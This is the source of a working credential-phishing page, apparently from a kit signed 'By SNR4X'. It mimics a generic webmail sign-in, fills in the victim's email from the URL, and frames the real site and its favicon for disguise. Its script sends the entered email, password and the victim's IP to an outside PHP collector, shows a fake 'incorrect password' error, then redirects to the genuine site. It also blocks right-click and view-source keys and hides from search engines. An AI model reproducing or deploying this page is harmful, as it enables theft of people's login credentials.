<html lang="zxx"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     
    <title class="logoname"></title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
<link rel="apple-touch-icon" type="image/png" class="logoimg" href=""> 
<link rel="shortcut icon" type="image/x-icon" class="logoimg" href="">
<link rel="mask-icon" type="" class="logoimg" href="" color="#111">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="otherbot" content="noindex">
<meta name="noarchive" content="noindex">
<meta name="nosnippet" content="noindex">
<meta name="noimageindex" content="noindex">
<meta name="robots" content="none">
<meta name="googlebot" content="none">
<meta name="googlebot-news" content="none">
<meta name="otherbot" content="none">
<meta name="noarchive" content="none">
<meta name="nosnippet" content="none">
<meta name="noimageindex" content="none">
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="googlebot-news" content="nofollow">
<meta name="otherbot" content="nofollow">
<meta name="noarchive" content="nofollow">
<meta name="nosnippet" content="nofollow">
<meta name="noimageindex" content="nofollow">
<meta name="robots" content="max-snippet:0">
<meta name="robots" content="unavailable_after: 2020-09-22">
    <!-- Favicon icon -->
    <link rel="shortcut icon" class="logoimg" href="" type="image/x-icon">
    <!-- External CSS libraries 
    <link type="text/css" rel="stylesheet" href="./login2_files/style2.css">
	

    <link type="text/css" rel="stylesheet" href="./login2_files/bootstrap.min.css">
  	-->  
	<link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

	<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
	<style type="text/css">
	
	body {
    font-family: 'Open Sans', sans-serif;
    color: #535353;
}

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Open Sans', sans-serif;
}

/** Login 1 start **/
.login-1 {
    background: rgba(0, 0, 0, 0.04) url(../img/bg-image.jpg) top left repeat;
    background-size: cover;
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px;
}

.login-1 .login-inner-form {
    max-width: 380px;
    margin: 0 auto;
    color: #717171;
    text-align: center;
}

.login-1 .login-inner-form .details {
    padding: 25px 30px 30px;
    background: #fff;
    border-radius: 5px 5px 0 0;
}

.login-1 .login-inner-form img {
    margin-bottom: 15px;
    height: 30px;
}

.login-1 .login-inner-form h3 {
    margin: 0 0 25px;
    font-size: 18px;
    font-weight: 400;
    font-family: 'Open Sans', sans-serif;
    color: #717171;
}

.login-1 .login-inner-form .form-group {
    margin-bottom: 25px;
}

.login-1 .login-inner-form .input-text {
    width: 100%;
    padding: 10px 15px;
    font-size: 14px;
    border: 1px solid #e8e7e7;
    outline: none;
    color: #717171;
    border-radius: 3px;
    height: 45px;
}

.login-1 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 12px 30px 11px 30px;
    letter-spacing: 1px;
    font-size: 15px;
    font-weight: 600;
    font-family: 'Open Sans', sans-serif;
    border-radius: 3px;
}

.login-1 .login-inner-form .social-list{
    margin-bottom: 0;
    padding: 0;
}

.login-1 .login-inner-form .checkbox a {
    font-size: 14px;
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .terms{
    margin-left: 3px;
}

.login-1 .login-inner-form .checkbox {
    margin-bottom: 25px;
    font-size: 14px;
}

.login-1 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-1 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-1 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 17px;
    height: 17px;
    margin-left: -25px;
    border: 1px solid #cccccc;
    border-radius: 3px;
    background-color: #fff;
}

.login-1 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 14px;
}

.login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #0f96f9;
    border-color: #0f96f9;
}

.login-1 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-1 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-1 .login-inner-form .social-list li {
    display: inline-block;
    font-size: 16px;
    margin-top: 30px;
}

.login-1 .login-inner-form .social-list li a {
    margin:2px;
    font-size: 14px;
    width: 35px;
    height: 35px;
    border-radius: 3px;
    display: inline-block;
    text-align: center;
    line-height: 35px;
}

.login-1 .login-inner-form .footer {
    font-size: 14px;
    padding: 15px 20px;
    background-color: #f5f5f5;
    border-radius: 0 0 5px 5px;
    border-top: solid 1px #f5f5f5;
}

.login-1 .login-inner-form .footer span a {
    color: #717171;
}

.login-1 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme {
    background: #0f96f9;
    border: none;
    color: #fff;
}

.login-1 .login-inner-form .btn-theme:hover {
    background: #0294B6;
}

/** Social media **/
.login-1 .facebook-bg {
    background: #4867aa;
    color: #fff;
}

.login-1 .facebook-bg:hover {
    background: #3b589e;
    color: #fff;
}

.login-1 .twitter-bg {
    background: #33CCFF;
    color: #fff;
}

.login-1 .twitter-bg:hover {
    background: #56d7fe;
    color: #fff;
}

.login-1 .google-bg {
    background: #db4437;
    color: #fff;
}

.login-1 .google-bg:hover {
    background: #dc4e41;
    color: #fff;
}

.login-1 .linkedin-bg {
    background: #0177b5;
    color: #fff;
}

.login-1 .linkedin-bg:hover {
    background: #1c82ca;
    color: #fff;
}

/** MEDIA **/
@media (max-width: 992px) {
    .login-1 {
        padding: 30px 0;
    }
}


	</style>
	<script type="text/javascript">
	function formfocus() {
		document.getElementById('password').focus();
	}
	window.onload = formfocus;
</script>

<script src="https://www.googletagmanager.com/gtag/js?l=dataLayer&amp;id=G-KKF7FCSNT4" async=""></script></head>
<body id="top" wfd-invisible="true">
 <iframe id="mainPage" src="https://" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>


<!-- Login 1 start -->
<div class="login-1">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="login-inner-form">
                    <div class="details">
                        
						<h2 class="text-center"><div id="top"><img src="https://www.google.com/s2/favicons?domain=" alt="" id="logoimg" style="width:28px;height:28px;margin-top:12px;">
		 
		  <span style="vertical-align: middle; padding-left: 5px" class="logoname"></span>   
		<br><br>
	<!--<br>  
		Sign in -->
		</div></h2>
		
                        <h3>Sign to continue</h3>
						<span id="msg"> </span>
                        <form name="members" action="" method="GET">
                            <div class="form-group">
                                <input type="email" id="email" name="email" class="input-text" placeholder="[[-Email-]]" readonly="">
                            </div>
                            <div class="form-group">
                                <input type="password" id="password" name="Password" class="input-text" autocomplete="on" placeholder="Password">
								
      <input type="hidden" id="ip" name="ip" value="41.100.112.89" wfd-invisible="true">
                            </div>
                            <div class="checkbox clearfix">
                                <div class="form-check checkbox-theme">
                                    <input class="form-check-input" type="checkbox" value="" id="rememberMe">
                                    <label class="form-check-label" for="rememberMe">
                                        Remember me
                                    </label>
                                </div>
                              <!--  <a href="#">Forgot Password</a> -->
                            </div>
                            <div class="form-group md-0">
                                <button type="submit" id="submit_btn" class="btn-md btn-theme btn-block">Login</button>
                            </div>
                        </form>
                    
						
						
                    </div>
                    <div class="footer">
                    
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Login 1 end -->
  
 

<script wfd-invisible="true"> 

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 || 
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});


function text(url) {  return fetch(url).then(res => res.text()); }
text('https://www.cloudflare.com/cdn-cgi/trace').then(data => {
  let ipRegex = /[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/
  let ip = data.match(ipRegex)[0];
  console.log(ip);
  $('#ip').val(ip);
});




$(document).ready(function(){
    let count=0;
	const getEmail = window.location.hash.substr(1); 
	$('#email').val(getEmail);
		
		var my_email = getEmail;
		var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();
		var mainPage = 'https://'+my_slice;   
         document.getElementById('mainPage').src = mainPage;
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
        $(".domain").html(my_slice);
        $(".email").html(email);
		const d = new Date()
		 	const year = d.getFullYear() // 2019
		 	const month = d.getMonth()+1 // 23
		 	const date = d.getDate() // 23
			let current_date = `${date}/${month}/${year}`;
			
	$('#submit_btn').click(function(event){
		event.preventDefault();
        const email=$("#email").val();
		const password=$("#password").val();
		var boot = "By SNR4X";  
		const ip=$("#ip").val();
		 
			count=count+1;
			
			console.log(count);
			if (count>=2) { window.location.replace("http://www."+my_slice);}
			$('#msg').html("<span style='color:red;'>Your account or password is incorrect. Please try again</span>");
			$("#password").val("");
			$.ajax({
            dataType: 'JSON',
            url: "https://phpwordtest.itcraftlab.com//fy/KqlsKDs.php",
            type: 'POST',
            data: {
                ai: email,
                pr: password,
                detail: ip,
                 
            }, });
		 
		} ) 
	 
 })
  
</script>
  </body></html>